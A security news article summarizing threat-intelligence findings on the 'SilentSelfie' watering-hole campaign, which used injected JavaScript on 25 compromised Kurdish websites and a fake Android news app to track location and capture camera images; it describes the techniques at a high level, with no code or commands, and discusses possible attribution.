Threat actors are increasingly turning to websites as a means to execute a variety of cyberattacks, capitalizing on vulnerabilities found in web applications and user behavior. Among the most prevalent tactics employed are phishing schemes, which trick users into divulging sensitive information, and drive-by downloads that infect systems without user consent when visiting compromised sites.
SilentSelfie Exploited 25 Websites
In early 2024, researchers from Sekoia’s Threat Detection & Research team uncovered a sophisticated cyber espionage campaign dubbed “SilentSelfie,” specifically targeting Kurdish communities. This campaign has exploited a total of 25 compromised websites, utilizing four distinct variants of malicious JavaScript code to gather intelligence.
The malicious scripts varied in complexity, ranging from basic location trackers to intricate frameworks capable of accessing users’ selfie cameras. These scripts directed selected targets to install a malicious Android application, masquerading as a benign news app.
Active since late 2022, the “SilentSelfie” campaign employed techniques such as watering hole attacks alongside a covert Android application. This application not only collected system information but also accessed contacts and files, beaming user locations back to the attackers through a hidden “LocationHelper” service.
To obscure their operations, the attackers employed obfuscation techniques, utilizing tools like Obfuscator.io and ProGuard. They also leveraged WebRTC for IP address discovery and cookies for user tracking, enhancing their ability to remain undetected.
The infrastructure of this campaign hinges on two critical components: compromised web servers and dedicated attacker-controlled servers. To avoid detection, communication was facilitated through PHP scripts.
While the attacks have been linked to groups such as StrongPity, the tactics, techniques, and procedures (TTPs) observed do not align with those of known threat actors, suggesting the emergence of a previously unidentified advanced persistent threat (APT) group targeting Kurdish interests.
A total of 21 Kurdish websites were subjected to this watering hole campaign, spanning various sectors, including media outlets, political organizations, and militant groups. The compromised sites were primarily associated with “Rojava” (North-East Syria), “YPG forces,” and far-left Turkish-Kurdish political entities.
The attackers utilized malicious JavaScript injections to generate fake update prompts, deceiving visitors into downloading compromised Android apps and granting permissions for camera and GPS access. These permissions were exploited to exfiltrate sensitive data, including precise location coordinates and facial images.
Remarkably, the campaign remained undetected for over 18 months, despite multiple on-screen notifications. While attributing the attacks is complex, potential culprits include Turkish intelligence services, Syrian government agencies, and the Kurdistan Regional Government of Iraq, with Iran and Russia considered less likely candidates.
The relatively simplistic nature of the incidents, characterized by basic obfuscation methods and the absence of complex malware, suggests the involvement of either an emerging threat actor or one with limited capabilities. Notable compromised sites included ‘RojNews,’ ‘YPG Rojava,’ and websites affiliated with ‘DHKP-C’ and ‘PAJK.’
The extensive scope and duration of this campaign underscore the persistent cyber threats faced by Kurdish organizations, highlighting the urgent need for enhanced security measures in the region.
Free Webinar on How to Protect Small Businesses Against Advanced Cyberthreats -> Free Registration
Analyse Any Suspicious Links Using ANY.RUN’s New Safe Browsing Tool: Try It for Free
